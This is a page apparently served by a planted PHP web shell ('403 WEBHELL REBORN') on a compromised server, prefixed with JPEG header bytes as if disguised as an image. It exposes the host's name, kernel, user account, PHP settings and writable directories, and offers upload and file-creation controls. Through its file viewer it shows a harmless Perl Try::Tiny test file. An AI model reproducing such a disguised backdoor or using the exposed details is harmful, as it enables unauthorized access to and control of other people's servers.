ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache
System : Linux cloud.heroica.com.br 4.18.0-553.36.1.el8_10.x86_64 #1 SMP Wed Jan 22 03:07:54 EST 2025 x86_64
User : farolpborg ( 1053)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /proc/self/root/usr/share/doc/perl-Try-Tiny/t/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : //proc/self/root/usr/share/doc/perl-Try-Tiny/t/named.t
use strict;
use warnings;

use Test::More;

BEGIN {
    plan skip_all => "Sub::Util or Sub::Name required"
        unless eval { require Sub::Util; defined &Sub::Util::set_subname; }
            || eval { require Sub::Name; Sub::Name->VERSION(0.08) };
    plan tests => 3;
}

use Try::Tiny;

my $name;
try {
    $name = (caller(0))[3];
};
is $name, "main::try {...} ", "try name"; # note extra space

try {
    die "Boom";
} catch {
    $name = (caller(0))[3];
};
is $name, "main::catch {...} ", "catch name"; # note extra space

try {
    die "Boom";
} catch {
    # noop
} finally {
    $name = (caller(0))[3];
};
is $name, "main::finally {...} ", "finally name"; # note extra space

Anon7 - 2021